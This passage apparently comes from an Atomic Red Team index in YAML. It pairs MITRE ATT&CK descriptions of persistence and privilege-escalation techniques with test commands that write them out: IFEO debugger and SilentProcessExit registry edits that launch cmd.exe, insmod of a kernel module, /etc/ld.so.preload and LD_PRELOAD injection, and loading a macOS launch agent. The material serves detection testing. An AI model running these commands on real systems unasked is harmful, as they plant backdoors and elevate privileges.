NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) - - Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) - - Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. - - Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) - id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-08-26T14:18:08.480Z' - created: '2020-01-24T15:05:58.384Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1546.012 - atomic_tests: - - name: IFEO Add Debugger - auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\calc.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - -' - cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger - /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: IFEO Global Flags - auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\notepad.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: | - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" - cleanup_command: | - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1547.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.006 - url: https://attack.mitre.org/techniques/T1547/006 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. - - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html - description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. - Retrieved April 6, 2018. - source_name: Linux Kernel Module Programming Guide - - url: http://www.megasecurity.org/papers/Rootkits.pdf - description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved - April 6, 2018. - source_name: iDefense Rootkit Overview - - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html - description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility - to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' - source_name: Volatility Phalanx2 - - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ - description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. - Retrieved December 21, 2017. - source_name: CrowdStrike Linux Rootkit - - url: https://github.com/f0rb1dd3n/Reptile - description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved - April 9, 2018. - source_name: GitHub Reptile - - url: https://github.com/m0nad/Diamorphine - description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux - Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. - source_name: GitHub Diamorphine - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. - Retrieved April 6, 2018. - source_name: RSAC 2015 San Francisco Patrick Wardle - - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ - description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel - Extension Loading’ is Broken. Retrieved April 6, 2018. - source_name: Synack Secure Kernel Extension Broken - - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ - description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble - your MacOS spy. Retrieved April 6, 2018.' - source_name: Securelist Ventir - - source_name: Trend Micro Skidmap - url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ - description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux - Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. - Retrieved June 4, 2020. - - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html - description: Henderson, B. (2006, September 24). How To Insert And Remove - LKMs. Retrieved April 9, 2018. - source_name: Linux Loadable Kernel Module Insert and Remove LKMs - - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux - description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved - April 9, 2018. - source_name: Wikipedia Loadable Kernel Module - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Kernel Modules and Extensions - description: |- - Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  - - When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) - - Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. - - Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) - id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-30T21:23:15.188Z' - created: '2020-01-24T17:42:23.339Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - root - x_mitre_detection: |- - Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) - - For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. - - Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Anastasios Pingios - - Jeremy Galloway - - Red Canary - x_mitre_platforms: - - macOS - - Linux - identifier: T1547.006 - atomic_tests: - - name: Linux - Load Kernel Module via insmod - auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 - description: 'This test uses the insmod command to load a kernel module for - Linux. - -' - supported_platforms: - - linux - input_arguments: - module_name: - description: Name of the kernel module name. - type: string - default: T1547006 - module_path: - description: Folder used to store the module. - type: path - default: "/tmp/T1547.006/T1547006.ko" - temp_folder: - description: Temp folder used to compile the code. - type: path - default: "/tmp/T1547.006" - module_source_path: - description: Path to download Gsecdump binary file - type: url - default: PathToAtomicsFolder/T1547.006/src - dependency_executor_name: bash - dependencies: - - description: 'The kernel module must exist on disk at specified location - -' - prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - -' - get_prereq_command: | - if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; - cp #{module_source_path}/* #{temp_folder}/ - cd #{temp_folder}; make - if [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; - executor: - command: 'sudo insmod #{module_path} - -' - cleanup_command: | - sudo rmmod #{module_name} - [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} - name: bash - elevation_required: true - T1546.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.006 - url: https://attack.mitre.org/techniques/T1546/006 - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: LC_LOAD_DYLIB Addition - description: |- - Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. - - Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) - id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:50:36.235Z' - created: '2020-01-24T14:21:52.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Monitor processes for those that may be used to modify binary - headers. Monitor file systems for changes to application binaries and invalid - checksums/signatures. Changes to binaries that do not line up with application - updates or patches are also extremely suspicious. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Binary file metadata - x_mitre_platforms: - - macOS - atomic_tests: [] - T1574.006: - technique: - id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 - description: |- - Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) - - Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) - - LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process. - name: LD_PRELOAD - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.006 - url: https://attack.mitre.org/techniques/T1574/006 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - source_name: Man LD.SO - url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved - June 15, 2020. - - source_name: TLDP Shared Libraries - url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved - January 31, 2020. - - source_name: Code Injection on Linux and macOS - url: https://www.datawire.io/code-injection-on-linux-and-macos/ - description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt - for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved - December 20, 2017.' - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. - Retrieved December 20, 2017. - source_name: Uninformed Needle - - url: http://phrack.org/issues/51/8.html - description: halflife. (1997, September 1). Shared Library Redirection Techniques. - Retrieved December 20, 2017. - source_name: Phrack halfdead 1997 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:49:46.904Z' - created: '2020-03-13T20:09:59.569Z' - x_mitre_platforms: - - Linux - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Environment variable - x_mitre_detection: |- - Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1574.006 - atomic_tests: - - name: Shared Library Injection via /etc/ld.so.preload - auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - description: "This test adds a shared library to the `ld.so.preload` list to - execute and intercept API calls. This technique was used by threat actor Rocke - during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon - successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. - \n" - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - -' - cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - -' - name: bash - elevation_required: true - - name: Shared Library Injection via LD_PRELOAD - auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - description: | - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - - Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'LD_PRELOAD=#{path_to_shared_library} ls - -' - name: bash - T1547.008: - technique: - created: '2020-01-24T18:38:55.801Z' - modified: '2020-03-25T16:52:26.567Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 - description: |- - Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) - - Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. - name: LSASS Driver - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.008 - url: https://attack.mitre.org/techniques/T1547/008 - - url: https://technet.microsoft.com/library/cc961760.aspx - description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved - November 27, 2017. - source_name: Microsoft Security Subsystem - - url: https://technet.microsoft.com/library/dn408187.aspx - description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. - Retrieved November 27, 2017. - source_name: Microsoft LSA Protection Mar 2014 - - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx - description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November - 27, 2017. - source_name: Microsoft DLL Security - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Vincent Le Toux - x_mitre_data_sources: - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events - 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: - Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. - (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc - utility (Citation: TechNet Autoruns) to examine loaded drivers associated - with the LSA. " - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1543.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.001 - url: https://attack.mitre.org/techniques/T1543/001 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware - is hungry for credentials. Retrieved July 3, 2017. - source_name: OSX Keydnap malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ - description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated - code. Retrieved July 5, 2017. - source_name: Antiquated Mac Malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. - source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application - Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. - source_name: OceanLotus for OS X - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Agent - description: "Adversaries may create or modify launch agents to repeatedly execute - malicious payloads as part of persistence. Per Apple’s developer documentation, - when a user logs in, a per-user launchd process is started which loads the - parameters for each launch-on-demand user agent from the property list (plist) - files found in /System/Library/LaunchAgents, /Library/LaunchAgents, - and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent - Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). - These launch agents have property list files which point to the executables - that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install - a new launch agent that can be configured to execute at login by using launchd - or launchctl to load a plist into the appropriate directories (Citation: - Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The - agent name may be disguised by using a name from a related operating system - or benign software. Launch Agents are created with user level privileges and - are executed with the privileges of the user when they log in (Citation: OSX - Malware Detection) (Citation: OceanLotus for OS X). They can be set up to - execute when a specific user logs in (in the specific user’s directory structure) - or when any user logs in (which requires administrator privileges)." - id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T22:11:45.513Z' - created: '2020-01-17T16:10:58.592Z' - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: Monitor Launch Agent creation through additional plist files - and utilities such as Objective-See’s KnockKnock application. Launch Agents - also require files on disk for persistence which can also be monitored via - other file monitoring applications. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_platforms: - - macOS - identifier: T1543.001 - atomic_tests: - - name: Launch Agent - auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 - description: 'Create a plist and execute it - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; - exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; - sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} - sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} - cleanup: | - sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} - sudo rm ~/Library/LaunchAgents/#{plist_filename} - T1543.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.004 - url: https://attack.mitre.org/techniques/T1543/004 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf - description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. - Retrieved July 10, 2017.' - source_name: WireLurker - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Daemon - description: "Adversaries may create or modify launch daemons to repeatedly - execute malicious payloads as part of persistence. Per Apple’s developer documentation, - when macOS and OS X boot up, launchd is run to finish system initialization. - This process loads the parameters for each launch-on-demand system-level daemon - from the property list (plist) files found in /System/Library/LaunchDaemons - and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent - Daemons). These LaunchDaemons have property list files which point to the - executables that will be launched (Citation: Methods of Mac Malware Persistence). - \n\nAdversaries may install a new launch daemon that can be configured to - execute at startup by using launchd or launchctl to load a plist into the - appropriate directories (Citation: OSX Malware Detection). The daemon name - may be disguised by using a name from a related operating system or benign - software (Citation: WireLurker). Launch Daemons may be created with administrator - privileges, but are executed under root privileges, so an adversary may also - use a service to escalate privileges from administrator to root. \n\nThe plist - file permissions must be root:wheel, but the script or program that it points - to has no such requirement. So, it is possible for poor configurations to - allow an adversary to modify a current Launch Daemon’s executable and gain - persistence or Privilege Escalation. " - id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:46:44.130Z' - created: '2020-01-17T19:23:15.227Z' - x_mitre_data_sources: - - File monitoring - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor for launch daemon creation or modification through - plist files and utilities such as Objective-See''s KnockKnock application. ' - x_mitre_platforms: - - macOS - identifier: T1543.004 - atomic_tests: - - name: Launch Daemon - auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf - description: 'Utilize LaunchDaemon to launch `Hello World` - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - 